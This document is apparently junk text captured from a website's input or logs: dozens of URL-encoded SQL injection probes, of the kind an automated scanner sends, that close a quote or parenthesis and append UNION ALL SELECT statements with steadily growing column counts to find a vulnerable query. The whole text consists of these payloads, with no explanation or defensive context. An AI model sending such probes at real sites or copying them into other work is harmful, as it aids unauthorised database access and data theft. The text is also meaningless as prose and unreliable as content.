-6838%27%7C%7C%28SELECT%20%27OSfY%27%20WHERE%201120%3D1120%20UNION%20ALL%20SELECT%201120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120%2C1120--%20 -1753%27%7C%7C%28SELECT%20%27dyjS%27%20WHERE%209466%3D9466%20UNION%20ALL%20SELECT%209466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466%2C9466--%20 -7629%27%7C%7C%28SELECT%20%27AYwd%27%20WHERE%203809%3D3809%20UNION%20ALL%20SELECT%203809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809%2C3809--%20 -6023%27%7C%7C%28SELECT%20%27TEdj%27%20WHERE%207509%3D7509%20UNION%20ALL%20SELECT%207509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509%2C7509--%20 -5162%27%7C%7C%28SELECT%20%27lOUS%27%20WHERE%203011%3D3011%20UNION%20ALL%20SELECT%203011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011%2C3011--%20 -6947%27%7C%7C%28SELECT%20%27Zqaw%27%20WHERE%202057%3D2057%20UNION%20ALL%20SELECT%202057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057--%20 -5846%27%7C%7C%28SELECT%20%27TXcW%27%20WHERE%201045%3D1045%20UNION%20ALL%20SELECT%201045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045%2C1045--%20 -2338%27%7C%7C%28SELECT%20%27FBSe%27%20WHERE%206881%3D6881%20UNION%20ALL%20SELECT%206881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881%2C6881--%20 -8556%27%7C%7C%28SELECT%20%27YgCG%27%20WHERE%205137%3D5137%20UNION%20ALL%20SELECT%205137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137%2C5137--%20 -2650%27%7C%7C%28SELECT%20%27BmWr%27%20WHERE%201635%3D1635%20UNION%20ALL%20SELECT%201635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635%2C1635--%20 -5458%27%2B%28SELECT%20rfix%20WHERE%209614%3D9614%20UNION%20ALL%20SELECT%209614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614%2C9614--%20 -9595%27%2B%28SELECT%20IBFS%20WHERE%202315%3D2315%20UNION%20ALL%20SELECT%202315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315%2C2315--%20 -2641%27%2B%28SELECT%20BXGW%20WHERE%209205%3D9205%20UNION%20ALL%20SELECT%209205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205%2C9205--%20 -2861%27%2B%28SELECT%20cFtY%20WHERE%209556%3D9556%20UNION%20ALL%20SELECT%209556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556%2C9556--%20 -1594%27%2B%28SELECT%20Njkf%20WHERE%203097%3D3097%20UNION%20ALL%20SELECT%203097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097%2C3097--%20 -2968%27%2B%28SELECT%20smtn%20WHERE%205347%3D5347%20UNION%20ALL%20SELECT%205347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347%2C5347--%20 -5141%27%2B%28SELECT%20FJQX%20WHERE%202908%3D2908%20UNION%20ALL%20SELECT%202908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908%2C2908--%20 -1943%27%2B%28SELECT%20lvhj%20WHERE%207812%3D7812%20UNION%20ALL%20SELECT%207812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812%2C7812--%20 -1208%27%2B%28SELECT%20YzIr%20WHERE%204569%3D4569%20UNION%20ALL%20SELECT%204569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569%2C4569--%20 -7961%27%2B%28SELECT%20zvzf%20WHERE%205894%3D5894%20UNION%20ALL%20SELECT%205894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894%2C5894--%20 -5564%27%2B%28SELECT%20%27easd%27%20WHERE%209521%3D9521%20UNION%20ALL%20SELECT%209521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521%2C9521--%20 -1824%27%2B%28SELECT%20%27KRTv%27%20WHERE%206887%3D6887%20UNION%20ALL%20SELECT%206887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887%2C6887--%20 -2244%27%2B%28SELECT%20%27rijd%27%20WHERE%205748%3D5748%20UNION%20ALL%20SELECT%205748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748%2C5748--%20 -4121%27%2B%28SELECT%20%27UtFo%27%20WHERE%205179%3D5179%20UNION%20ALL%20SELECT%205179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179%2C5179--%20 -8972%27%2B%28SELECT%20%27NXLl%27%20WHERE%203474%3D3474%20UNION%20ALL%20SELECT%203474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474%2C3474--%20 -8419%27%2B%28SELECT%20%27ORrf%27%20WHERE%204823%3D4823%20UNION%20ALL%20SELECT%204823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823%2C4823--%20 -3550%27%2B%28SELECT%20%27Bcpq%27%20WHERE%201536%3D1536%20UNION%20ALL%20SELECT%201536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536%2C1536--%20 -7131%27%2B%28SELECT%20%27zMHD%27%20WHERE%208267%3D8267%20UNION%20ALL%20SELECT%208267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267%2C8267--%20 -6078%27%2B%28SELECT%20%27PTEo%27%20WHERE%203259%3D3259%20UNION%20ALL%20SELECT%203259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259%2C3259--%20 -8535%27%2B%28SELECT%20%27KmWW%27%20WHERE%206438%3D6438%20UNION%20ALL%20SELECT%206438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438%2C6438--%20 -2243%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417%2C1417--%20 -2987%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774%2C5774--%20 -2732%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717%2C9717--%20 -9355%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436%2C8436--%20 -7701%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242%2C4242--%20 -7905%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056%2C7056--%20 -9803%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190%2C9190--%20 -3184%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288%2C9288--%20 -9544%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723%2C3723--%20 -2519%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%201690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690%2C1690--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 foo%27%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 